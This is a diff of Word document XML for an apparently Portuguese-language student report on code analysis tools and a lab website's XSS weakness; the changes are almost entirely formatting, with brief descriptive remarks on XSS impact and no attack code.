+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:t>s possiveis informações de autorização/metadados</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:t xml:space="preserve"> e mais do que isso, roubar e manipular a identidade da vitima</w:t>
@@ -8754,6 +10404,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
       </w:pPr>
@@ -8761,6 +10412,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
       </w:pPr>
@@ -8772,15 +10424,19 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="16"/>
         </w:numPr>
-        <w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7205415E" wp14:editId="15157DD0">
             <wp:extent cx="5400040" cy="3752850"/>
@@ -8819,6 +10475,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:t>A vulnerabilidade de XSS já é bastante reconhecida e já existem bastantes ferramentas no mercado que ajudam a prevenir a mesma, os impactos causados numa aplicação real seriam devastadores para o quão simples um malfeitor é capaz de utilizar a vulnerabilidade exposta neste website. Outros casos reais causaram impactos de grande risco à empresa devido à sensibilidade dos dados que foram expostos.</w:t>
@@ -8931,6 +10588,98 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="052752B8"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9AE4A234"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="05CD36F0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="214261B6"/>
@@ -9051,7 +10800,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="10B81914"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="78DAC1EA"/>
@@ -9164,7 +10913,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="10BD581F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E7DA50BC"/>
@@ -9277,7 +11026,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="184D7C12"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="214261B6"/>
@@ -9398,7 +11147,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="191204D7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A176A4C4"/>
@@ -9487,7 +11236,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1E9C72C0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="212E6CEA"/>
@@ -9600,7 +11349,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="201D378E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A864A3E6"/>
@@ -9689,7 +11438,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="288B2403"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E126F2D6"/>
@@ -9778,7 +11527,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2E0E0C36"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="45D0D042"/>
@@ -9891,7 +11640,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="321228C0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="214261B6"/>
@@ -10012,7 +11761,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="411D4876"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="214261B6"/>
@@ -10133,7 +11882,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="47F07EF2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CFC2DA9A"/>
@@ -10222,7 +11971,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6B417DE9"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="214261B6"/>
@@ -10343,7 +12092,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6D9E11F6"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6452F2E0"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="72FC769C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2D4C0DE4"/>
@@ -10432,7 +12294,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="77C20D83"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="214261B6"/>
@@ -10553,7 +12415,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7F801B08"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="214261B6"/>
@@ -10675,52 +12537,58 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="415831203">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="700980505">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1234974110">
     <w:abstractNumId w:val="9"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="700980505">
+  <w:num w:numId="4" w16cid:durableId="258218542">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="924727896">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="1234974110">
+  <w:num w:numId="6" w16cid:durableId="577444158">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="615798303">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="522520348">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="982738391">
+    <w:abstractNumId w:val="17"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="1492603585">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="180096674">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="12" w16cid:durableId="48235752">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="1655260437">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="14" w16cid:durableId="1292128633">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="15" w16cid:durableId="1473404762">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="16" w16cid:durableId="514851648">
     <w:abstractNumId w:val="8"/>
   </w:num>
-  <w:num w:numId="4" w16cid:durableId="258218542">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
-  <w:num w:numId="5" w16cid:durableId="924727896">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
-  <w:num w:numId="6" w16cid:durableId="577444158">
-    <w:abstractNumId w:val="12"/>
-  </w:num>
-  <w:num w:numId="7" w16cid:durableId="615798303">
-    <w:abstractNumId w:val="10"/>
-  </w:num>
-  <w:num w:numId="8" w16cid:durableId="522520348">
+  <w:num w:numId="17" w16cid:durableId="805396472">
     <w:abstractNumId w:val="14"/>
   </w:num>
-  <w:num w:numId="9" w16cid:durableId="982738391">
-    <w:abstractNumId w:val="15"/>
-  </w:num>
-  <w:num w:numId="10" w16cid:durableId="1492603585">
+  <w:num w:numId="18" w16cid:durableId="1795563201">
     <w:abstractNumId w:val="0"/>
-  </w:num>
-  <w:num w:numId="11" w16cid:durableId="180096674">
-    <w:abstractNumId w:val="13"/>
-  </w:num>
-  <w:num w:numId="12" w16cid:durableId="48235752">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
-  <w:num w:numId="13" w16cid:durableId="1655260437">
-    <w:abstractNumId w:val="11"/>
-  </w:num>
-  <w:num w:numId="14" w16cid:durableId="1292128633">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
-  <w:num w:numId="15" w16cid:durableId="1473404762">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
-  <w:num w:numId="16" w16cid:durableId="514851648">
-    <w:abstractNumId w:val="7"/>
   </w:num>
 </w:numbering>
 </file>
@@ -11326,7 +13194,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/TP2/GN11_TP2.docx
+++ b/TP2/GN11_TP2.docx
@@ -2708,35 +2708,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Trabalho e estudo sobre ferramentas de análise estática e dinâmica de código </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>(parte 2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> do enunciado</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, como </w:t>
+        <w:t xml:space="preserve">Trabalho e estudo sobre ferramentas de análise estática e dinâmica de código (parte 2 do enunciado), como </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3263,7 +3235,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7438DE22" wp14:editId="78229F6E">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7438DE22" wp14:editId="48529549">
             <wp:extent cx="3333750" cy="2824514"/>
             <wp:effectExtent l="19050" t="19050" r="19050" b="13970"/>
             <wp:docPr id="797099606" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
@@ -3877,14 +3849,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>que</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> é possível </w:t>
+        <w:t xml:space="preserve">que é possível </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9211,21 +9176,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>sendo a senha correta admin123.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Figura 8)</w:t>
+        <w:t>, sendo a senha correta admin123. (Figura 8)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9246,7 +9197,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D3D7FCA" wp14:editId="438AAB13">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D3D7FCA" wp14:editId="04C9AF31">
             <wp:extent cx="5400040" cy="708058"/>
             <wp:effectExtent l="19050" t="19050" r="10160" b="15875"/>
             <wp:docPr id="1178401247" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
@@ -9719,7 +9670,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50C8C7C1" wp14:editId="0A984F0B">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50C8C7C1" wp14:editId="6E27B7F9">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:align>right</wp:align>
@@ -10026,10 +9977,24 @@
           <w:noProof/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
+        <w:t>(Figura 10)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04800AE8" wp14:editId="15482312">
-            <wp:extent cx="5400040" cy="2750185"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F377BEB" wp14:editId="765FE573">
+            <wp:extent cx="3657600" cy="1862778"/>
+            <wp:effectExtent l="19050" t="19050" r="19050" b="23495"/>
             <wp:docPr id="933867805" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -10050,11 +10015,16 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="2750185"/>
+                      <a:ext cx="3666306" cy="1867212"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -10065,34 +10035,93 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
       </w:pPr>
